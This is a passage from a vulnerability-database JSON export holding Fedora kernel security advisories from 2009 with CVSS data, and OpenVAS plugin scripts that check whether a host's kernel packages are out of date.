prefix:\"pulseaudio-utils\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-utils-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-05T00:35:52", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.3.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2009-08-05T00:35:52", "id": "FEDORA:3462710F8B9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DTUSA3L3RWF5CKQRSUPU4HGHFNWWUIO6/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-15T21:45:53", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.7.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692"], "modified": "2009-08-15T21:45:53", "id": "FEDORA:7B88D10F857", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLV55DRGD7NIZMO6KJQWG5Z2QD7L472G/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-17T22:00:48", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.8.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2767"], "modified": "2009-08-17T22:00:48", "id": "FEDORA:43A4210F8C3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MSD6F5KGVWME2BOBFNQP525FTNYYH6EC/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-05T00:30:27", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.29-170.2.78.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2009-08-05T00:30:27", "id": "FEDORA:91FDD10F8A2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QTXEWTOSJ3Y767PPNY3FBWJI6BQYWWW3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-15T21:45:33", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.29-170.2.79.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692"], "modified": "2009-08-15T21:45:33", "id": "FEDORA:5B2C610F862", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MAQQYLT4QWLTVGYYPTC2TUL3FWMGFT6V/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-08-27T02:19:22", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: kernel-2.6.29.6-217.2.16.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2691", "CVE-2009-2692", "CVE-2009-2695", "CVE-2009-2767", "CVE-2009-2847", "CVE-2009-2848", "CVE-2009-2849"], "modified": "2009-08-27T02:19:22", "id": "FEDORA:921C610F878", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DPPW4MDQO74VWNGBP5Z3DR6V3V2WA35P/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-10-03T18:56:05", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.35-170.2.94.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3001", "CVE-2009-3002", "CVE-2009-3290"], "modified": "2009-10-03T18:56:05", "id": "FEDORA:2CF2010F7EA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AIU4FYCISH7YP6ZRGW5APZ4RJQAPH4P6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-10-15T22:37:20", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.37-170.2.104.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-2908", "CVE-2009-2909", "CVE-2009-2910", "CVE-2009-3290"], "modified": "2009-10-15T22:37:20", "id": "FEDORA:C80E110F85F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/76PC66MBDWWM3HWZ5XTOP32ZACNOKBDI/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-11-06T00:05:15", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.38-170.2.113.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3290", "CVE-2009-3547", "CVE-2009-3612", "CVE-2009-3620", "CVE-2009-3621", "CVE-2009-3638"], "modified": "2009-11-06T00:05:15", "id": "FEDORA:F394810F8A0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/R2OASDOPR5TXTMMAQM2WQ4FUYYEZFDVY/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "cvss3": {}, "published": "2009-12-11T18:26:18", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: kernel-2.6.27.41-170.2.117.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5079", "CVE-2009-0065", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692", "CVE-2009-2847", "CVE-2009-2903", "CVE-2009-3080", "CVE-2009-3290", "CVE-2009-3547", "CVE-2009-3612", "CVE-2009-3620", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2009-4031"], "modified": "2009-12-11T18:26:18", "id": "FEDORA:52EFE10F85C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VKCD2YRIM5ILQXE36S6T7O2IOBF5WLXL/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:49", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8144 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64553", "href": "http://plugins.openvas.org/nasl.php?oid=64553", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8144.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8144 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\nLinux operating system. The kernel handles the basic functions\nof the operating system: memory allocation, process allocation, device\ninput and output, etc.\n\nUpdate Information:\n\nFix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\n* Thu Jul 23 2009 Kyle McMartin 2.6.29.6-217\n- Apply three patches requested by sgruszka@redhat.com:\n- iwl3945-release-resources-before-shutting-down.patch\n- iwl3945-add-debugging-for-wrong-command-queue.patch\n- iwl3945-fix-rfkill-sw-and-hw-mishmash.patch\n* Thu Jul 23 2009 Jarod Wilson \n- virtio_blk: don't bounce highmem requests, works around a frequent\noops in kvm guests using virtio block devices (#510304)\n* Wed Jul 22 2009 Tom spot Callaway \n- We have to override the new %install behavior because, well... the kernel is\nspecial.\n* Wed Jul 22 2009 Ben Skeggs \n- drm-nouveau.patch: Fix DPMS off for DAC outputs, NV4x PFIFO typo\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8144\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.\";\n\n\n\nif(description)\n{\n script_id(64553);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8144 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:31", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8144 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064553", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064553", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8144.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8144 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\nLinux operating system. The kernel handles the basic functions\nof the operating system: memory allocation, process allocation, device\ninput and output, etc.\n\nUpdate Information:\n\nFix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.3\n- Don't optimize away NULL pointer tests where pointer is used before the test.\n(CVE-2009-1897)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.2\n- Fix mmap_min_addr security bugs (CVE-2009-1895)\n* Wed Jul 29 2009 Chuck Ebbert 2.6.29.6-217.2.1\n- Fix eCryptfs overflow issues (CVE-2009-2406, CVE-2009-2407)\n* Thu Jul 23 2009 Kyle McMartin 2.6.29.6-217\n- Apply three patches requested by sgruszka@redhat.com:\n- iwl3945-release-resources-before-shutting-down.patch\n- iwl3945-add-debugging-for-wrong-command-queue.patch\n- iwl3945-fix-rfkill-sw-and-hw-mishmash.patch\n* Thu Jul 23 2009 Jarod Wilson \n- virtio_blk: don't bounce highmem requests, works around a frequent\noops in kvm guests using virtio block devices (#510304)\n* Wed Jul 22 2009 Tom spot Callaway \n- We have to override the new %install behavior because, well... the kernel is\nspecial.\n* Wed Jul 22 2009 Ben Skeggs \n- drm-nouveau.patch: Fix DPMS off for DAC outputs, NV4x PFIFO typo\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8144\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8144.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64553\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8144 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = 